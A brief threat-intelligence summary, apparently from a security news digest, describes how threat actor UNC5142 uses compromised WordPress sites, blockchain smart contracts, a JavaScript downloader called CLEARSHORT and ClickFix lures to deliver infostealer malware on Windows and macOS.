UNC5142 is a sophisticated threat actor that leverages blockchain smart contracts and compromised WordPress websites to distribute information-stealing malware such as Atomic, Lumma, Rhadamanthys, and Vidar on both Windows and macOS platforms. Their evolving multi-layered infrastructure and innovative use of blockchain technology enhance their operational resilience and evasion capabilities. #UNC5142 #EtherHiding
Keypoints
- UNC5142 uses compromised websites and blockchain smart contracts to deliver malware.
- The threat actor employs a multi-stage JavaScript downloader called CLEARSHORT for malware distribution.
- They exploit the proxy pattern in smart contracts to enable rapid updates and anti-takedown measures.
- Malware payloads are delivered via deceptive social engineering tactics like ClickFix to prompt victim action.
- The campaign has shown significant evolution, utilizing multi-contract systems on the blockchain for operational agility.
Read More: https://thehackernews.com/2025/10/hackers-abuse-blockchain-smart.html